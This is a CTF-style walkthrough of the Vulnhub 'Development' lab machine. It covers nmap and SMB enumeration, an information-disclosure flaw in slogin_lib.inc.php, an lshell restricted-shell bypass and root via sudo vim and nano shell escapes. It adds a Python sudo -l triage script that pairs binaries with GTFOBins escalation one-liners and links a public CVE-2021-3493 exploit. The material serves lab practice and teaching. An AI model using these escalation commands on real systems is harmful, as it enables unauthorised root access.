# Vulnhub-Development

## NMAP

```bash
nmap -sC -sV 192.168.1.6
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-15 11:28 PKT
Nmap scan report for 192.168.1.6
Host is up (0.041s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)
|_  256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)
113/tcp  open  ident?
|_auth-owners: oident
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: root
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
|_auth-owners: root
8080/tcp open  http-proxy  IIS 6.0
```

Two things worth noting before moving on: the `ident` service on 113 is answering `auth-owners` queries, which is why nmap can tell us that smbd runs as `root`, and the "IIS 6.0" on 8080 is only the advertised `Server` header. Everything else on this host is Ubuntu, so treat that banner as a decoy rather than a Windows web server.

## PORT 139/445 (SMB)

We can see a share named `access`, so let's see if we can access it as an anonymous user.

Access is denied, so I ran `enum4linux-ng` and it found some users on the machine.

## PORT 8080

On port 8080 we see an HTML page giving us a hint to look at `html_pages`.

Here we can see a number of pages, so let's go through each of them one by one.

### About.html

This page tells us that they are creating a profile for `David`.

### Config.html

This page has nothing.

### Default.html

This page has something in binary, so let's convert it and see what it is. I have a feeling it's a rabbit hole.

Huh?
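Converting a page full of 0s and 1s by hand is error-prone, so here is a small decoder for the step above. It is an added example for this writeup, not the author's script: the page's real binary string is not reproduced, so `SAMPLE_HTML` is constructed (its two hidden strings are made up), and the function names are my own. It strips tags, pulls out runs of bits that are not glued to ordinary words or numbers, and decodes only those that form whole printable bytes, which is exactly the filter you want when deciding whether a page is a rabbit hole.

```python
"""Pull binary-encoded text out of an HTML page and decode it.

Added example for this writeup, not the author's script: the page's own
binary string is not reproduced, so SAMPLE_HTML below is constructed.
"""
from __future__ import annotations

import re

# Constructed sample: two space-separated/contiguous bit runs plus prose
# containing ordinary digits that must NOT be mistaken for binary.
SAMPLE_HTML = """<html><body>
<h1>Default</h1>
<p>01001000 01110101 01101000 00111111</p>
<p>0110011101101111011011110110010001100010011110010110010100100001</p>
<p>Page revision 10, 1 of 2 - not binary data</p>
</body></html>"""

# A run of 0/1 digits, optionally separated by spaces or tabs, that is not
# glued to other letters/digits (so "2021" or "v10" are not picked up).
# Newlines end a run, so each line of the page is decoded on its own.
_BIN_RUN = re.compile(r"(?<![0-9A-Za-z])[01](?:[01 \t]*[01])?(?![0-9A-Za-z])")
_TAG = re.compile(r"<[^>]+>")


def find_binary_runs(html: str) -> list[str]:
    """Return candidate bit strings (whitespace removed) found in the page text."""
    text = _TAG.sub(" ", html)  # replace tags with spaces so runs do not merge
    runs = []
    for m in _BIN_RUN.finditer(text):
        bits = re.sub(r"\s+", "", m.group(0))
        # Require whole bytes; short runs like "10" inside prose are noise.
        if len(bits) >= 8 and len(bits) % 8 == 0:
            runs.append(bits)
    return runs


def decode_bits(bits: str) -> str:
    """Decode a whole-byte bit string as 8-bit ASCII/Latin-1."""
    if len(bits) % 8:
        raise ValueError("bit string is not a whole number of bytes")
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))


def decode_page(html: str) -> list[str]:
    """Decode every binary run that yields printable text; drop the rest."""
    out = []
    for bits in find_binary_runs(html):
        decoded = decode_bits(bits)
        if decoded.isprintable():  # garbage bytes usually mean a wrong encoding
            out.append(decoded)
    return out


if __name__ == "__main__":
    for msg in decode_page(SAMPLE_HTML):
        print(msg)
```

If a run decodes to non-printable bytes, the encoding is probably not plain 8-bit ASCII (7-bit groups, reversed bit order, or a second layer such as base64 are common CTF twists); the printable filter keeps those out of the output instead of showing you noise.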
### Development.html

This page is interesting: it says there's a page `hackersecretpage` which contains a link to upload files, so let's see where that is.

Again this has nothing, but looking at the source code of `development.html` there's a comment.

### DevelopmentSecretPage

On clicking the link we get a page that tells us to log out.

Here I tried logging in with random credentials and got this error, which mentioned a file called `slogin_lib.inc.php`. I searched for the file name on Google and it straight away turned up an exploit for it.

Let's try the RFI exploit. I hosted a file on my machine to see whether the application would include it from there. It doesn't look like it worked, so let's try the sensitive information disclosure instead.

We got some hashes; let's try to crack them with `crackstation`.

Let's try to SSH into the machine.

We are in, but something looks odd: it says to type `?` for help. If we type commands other than these it will show an error, so it looks like we are in a restricted shell. I came across an error when I typed `id`, and it seems `lshell.py` is being used, so let's do a quick Google search on that.

lshell is a Python script that restricts which commands can be executed in the shell; the administrator can allow or forbid any commands they want. So that's what was happening. Let's search for any bypasses related to lshell:

https://www.aldeid.com/wiki/Lshell

Bingo, we can bypass this easily, so let's give it a try.

Reading `work.txt`:

```
1.Tell Patrick that shoutbox is not working. We need to revert to the old method to update David about shoutbox. For new, we will use the old director's landing page.
2.Patrick's start of the third year in this company!
3.Attend the meeting to discuss if password policy should be relooked at.
```

This isn't really helpful, so going back to Patrick's hash I tried to crack it one more time on an online site.

Now we have switched to `patrick` and can see that we can escalate to root using either `vim` or `nano`, so let's visit GTFOBins to escalate our shell.

### Using Vim

GTFOBins' sudo entry for vim is a one-liner: `sudo vim -c ':!/bin/sh'`.

### Using Nano

Launch nano as sudo (`sudo /bin/nano`), then press `Ctrl+R` (Read File) followed by `Ctrl+X` (Execute Command). You'll get a prompt at the bottom of the screen that runs whatever you type; GTFOBins suggests `reset; sh 1>&0 2>&0` so the spawned shell gets a usable terminal.

You got root!!!

## Unintended way to root

Recently an Ubuntu OverlayFS local privilege escalation was found:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3493

So I used that exploit to get root, using this PoC:

https://github.com/briskets/CVE-2021-3493/blob/main/exploit.c

It only works on Ubuntu kernels that predate the April 2021 fix, so check `uname -r` against the Ubuntu advisory before compiling it, and remember you need `gcc` on the target or a binary built for the same architecture.
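Before reaching for GTFOBins by hand, it helps to parse `sudo -l` and match every permitted binary against the GTFOBins sudo list, which is what the `patrick` step above amounts to. The following is an added example for this writeup, not the author's tooling: the `sudo -l` output and the hostname `development` are constructed, and `GTFOBINS_SUDO` is a small hand-picked subset of the real site (the quoted commands are the ones GTFOBins lists). Anything not in the table, such as a custom script under `/opt`, is left for manual review rather than silently ignored.

```python
"""Triage `sudo -l` output for binaries with known sudo escalations.

Added example for this writeup, not the author's tooling. The sudo -l
output below is constructed to mirror the patrick step (nano/vim);
GTFOBINS_SUDO is a hand-picked subset of https://gtfobins.github.io/.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of `sudo -l` output; the hostname is made up.
SAMPLE_SUDO_L = """Matching Defaults entries for patrick on development:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User patrick may run the following commands on development:
    (ALL : ALL) NOPASSWD: /usr/bin/vim
    (ALL : ALL) NOPASSWD: /bin/nano, /usr/bin/less
    (root) /usr/bin/apt-get
    (ALL) NOPASSWD: /opt/backup.sh
"""

# Subset of GTFOBins "sudo" entries; the technique strings quote the site.
GTFOBINS_SUDO = {
    "vim": "sudo vim -c ':!/bin/sh'",
    "vi": "sudo vi -c ':!/bin/sh' /dev/null",
    "nano": "sudo nano, then Ctrl+R Ctrl+X and run: reset; sh 1>&0 2>&0",
    "less": "sudo less /etc/profile, then type !/bin/sh",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "awk": "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "env": "sudo env /bin/sh",
    "apt-get": "sudo apt-get changelog apt, then type !/bin/sh",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
}


@dataclass
class SudoRule:
    runas: str        # contents of the "(user : group)" prefix
    nopasswd: bool    # NOPASSWD: tag present
    command: str      # command spec as listed, e.g. "/bin/nano"

    @property
    def binary(self) -> str:
        """Basename of the first token, used as the GTFOBins lookup key."""
        return self.command.split()[0].rsplit("/", 1)[-1]


# "(ALL : ALL) NOPASSWD: /bin/nano, /usr/bin/less" -> runas, tags, cmds
_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text: str) -> list[SudoRule]:
    """Parse the rule lines that follow 'may run the following commands'."""
    rules: list[SudoRule] = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue  # skip the 'Matching Defaults' block
        m = _RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        # A single rule line may list several commands separated by commas.
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append(SudoRule(m.group("runas").strip(), nopasswd, cmd))
    return rules


def flag_gtfobins(rules: list[SudoRule]) -> list[tuple[SudoRule, str]]:
    """Pair each rule whose binary has a known sudo escalation with the technique."""
    flagged = []
    for r in rules:
        if r.command == "ALL":
            flagged.append((r, "sudo su  (unrestricted sudo)"))
        elif r.binary in GTFOBINS_SUDO:
            flagged.append((r, GTFOBINS_SUDO[r.binary]))
    return flagged


if __name__ == "__main__":
    parsed = parse_sudo_l(SAMPLE_SUDO_L)
    for rule, technique in flag_gtfobins(parsed):
        tag = "NOPASSWD" if rule.nopasswd else "password"
        print(f"{rule.command:<20} ({tag}) -> {technique}")
    for rule in parsed:
        if rule.binary not in GTFOBINS_SUDO and rule.command != "ALL":
            print(f"{rule.command:<20} not in table, review manually")
```

The parser only reads lines in the rules block, so the indented `secure_path` continuation under "Matching Defaults" is not mistaken for a rule. Note that a rule requiring a password is still exploitable once you know the user's password, as was the case for `patrick` here; `nopasswd` only tells you whether you can skip that step.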